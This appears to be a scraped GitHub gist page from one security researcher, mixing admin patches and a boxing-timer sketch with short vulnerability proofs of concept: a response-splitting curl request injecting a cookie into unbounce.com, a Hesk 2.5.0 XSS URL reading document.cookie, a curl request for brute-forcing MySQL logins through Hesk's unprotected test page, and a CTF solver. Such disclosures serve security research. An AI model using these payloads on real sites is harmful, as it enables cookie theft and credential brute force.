cedric cedriczirtacic
@cedriczirtacic
cedriczirtacic / gist:7459317
Created November 14, 2013 00:48
Quick way to get current battery status (tested on Fedora 18).
( cd /sys/class/power_supply/BAT1/ && perl -e "printf(\"%%%d\n\",(( "`cat charge_now`" / "`cat charge_full`" ) * 100));" )
@cedriczirtacic
cedriczirtacic / webmin_postgresql_backup_compress.patch
Created December 18, 2013 14:14
Patch for webmin's postgresql backup script to enable gzip/bzip2 compression.
--- postgresql/backup.pl.old 2013-12-17 14:50:06.000000000 -0300
+++ postgresql/backup.pl 2013-12-17 16:25:52.000000000 -0300
@@ -2,6 +2,7 @@
# backup.pl
# Called by cron to backup a database
+my $compress;
$no_acl_check++;
require './postgresql-lib.pl';
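Review bot: `my $compress;` is added at file scope with no initializer and no comment stating which values it is expected to hold; since the description says the patch enables gzip/bzip2 compression, a short comment next to the declaration (for example `# undef, 'gzip' or 'bzip2'`) would document the contract for readers of backup.pl, and the part of the patch that actually assigns and uses the variable is not visible in this preview, so its value cannot be checked here.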
@cedriczirtacic
cedriczirtacic / unbounce_setcookie_poc.html
Last active October 13, 2017 17:16
Unbounce.com HTTP Response Splitting (CWE-113)
[cicatriz@localhost ~]$ curl -v 'http://go.unbounce.com/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2=' -H 'Host: go.unbound.com' -H 'Accept: */*'
* About to connect() to go.unbounce.com port 80 (#0)
* Trying 54.225.243.45...
* connected
* Connected to go.unbounce.com (54.225.243.45) port 80 (#0)
> GET /pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2= HTTP/1.1
> User-Agent: curl/7.27.0
> Host: go.unbound.com
> Accept: */*
>
@cedriczirtacic
cedriczirtacic / paytv.pl
Created April 8, 2014 15:12
Hacklu-2013 CTF - PayTV-200
#!/usr/bin/perl -w
# Pay TV (Category: Web) Author(s): qll, tangled
# These robo-friends were shocked to see that they had to pay to watch the news
# broadcast about the “Oktoberfest”. Can you help them?
# Here is your challenge: https://ctf.fluxfingers.net:1316/
#use strict;
use warnings;
use LWP::UserAgent;
use Data::Dumper;
@cedriczirtacic
cedriczirtacic / Hesk 2.5.0 XSS example
Created April 23, 2014 19:46
Hesk 2.5.0 XSS (CWE-79)
http://www.victim.com/ticket.php?track='),alert(document.cookie);//?&Refresh=36528&f=1
@cedriczirtacic
cedriczirtacic / attack
Last active August 29, 2015 14:04
Hesk 2.5.0 URL Redirection
HTTP/1.1 200 OK
Server: test
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2014 14:42:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 13
<h1>TEST</h1>
@cedriczirtacic
cedriczirtacic / gist:c32e8e4348b216c8d555
Created August 6, 2014 19:51
Hesk 2.5.0 Connection Brute Force
(*) There is no access control on the file test_connection.php, which performs connection tests for MySQL (and also POP3 and SMTP). This gives an attacker the opportunity to run a dictionary brute-force attack, checking every possible combination of username/password and/or database, without needing a direct connection to the MySQL service.
(*) proof-of-concept:
curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed
Where USERNAME, PASSWORD and DATABASE are the parameters to brute-force.
@cedriczirtacic
cedriczirtacic / puppet-dashboard.patch
Created March 19, 2015 14:49
More comprehensive restart for puppet-dashboard
--- /etc/init.d/puppet-dashboard.old 2015-03-19 11:36:46.000000000 -0300
+++ /etc/init.d/puppet-dashboard 2015-03-19 11:39:45.000000000 -0300
@@ -78,7 +78,13 @@
restart () {
stop
- start
+ RETVAL=$?
+ if [ $? -gt 0 ];then
+ return $RETVAL
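Review bot: the added check tests the wrong status. `RETVAL=$?` captures the exit status of `stop`, but the following `if [ $? -gt 0 ];then` examines `$?` again, which by then is the exit status of the assignment itself (always 0), so the early `return $RETVAL` can never be taken. The condition should read `if [ $RETVAL -gt 0 ]; then`. The hunk header also advertises six added lines but only three are visible in this preview, so the `start` call and the `fi` that close the block could not be reviewed.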
// Simple boxing timer
// turn on debug strings
#define DEBUG true
// leds
int pingreen = 13;
int pinred = 11;
// buzzer
int pinbuzz = 12;
@cedriczirtacic
cedriczirtacic / sarg_pfsense_0.6.10_LFI.patch
Created March 11, 2016 19:21
Fix for Local File Inclusion (CWE-98) on sarg 0.6.10 pfSense package
--- sarg_frame.php.old 2016-03-11 14:25:58.000000000 -0300
+++ sarg_frame.php 2016-03-11 16:09:53.000000000 -0300
@@ -34,6 +34,11 @@
ini_set('memory_limit', '250M');
}
+// Small security check
+if(!empty($_REQUEST['file'])){
+ $_REQUEST['file']=preg_replace('/(\.+\/|\\\.*|\/{2,})*/',"", $_REQUEST['file']);
+}
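Review bot: the alternative `\\\.*` in the `preg_replace` pattern reaches PCRE as `\\.*`, that is a literal backslash followed by an unescaped `.*`, so a single backslash in `file` discards the entire remainder of the value rather than only a `\.` sequence; more generally, deleting known traversal fragments in one pass is a denylist, not a positive check, for the CWE-98 issue the description names. Suggest replacing the in-place rewrite with an allowlist: reduce the value with `basename()`, resolve it with `realpath()` against the directory sarg reports live in, and reject the request unless the resolved path starts with that directory. Note also that only `$_REQUEST['file']` is rewritten, so any later code reading `$_GET['file']` or `$_POST['file']` still sees the raw value.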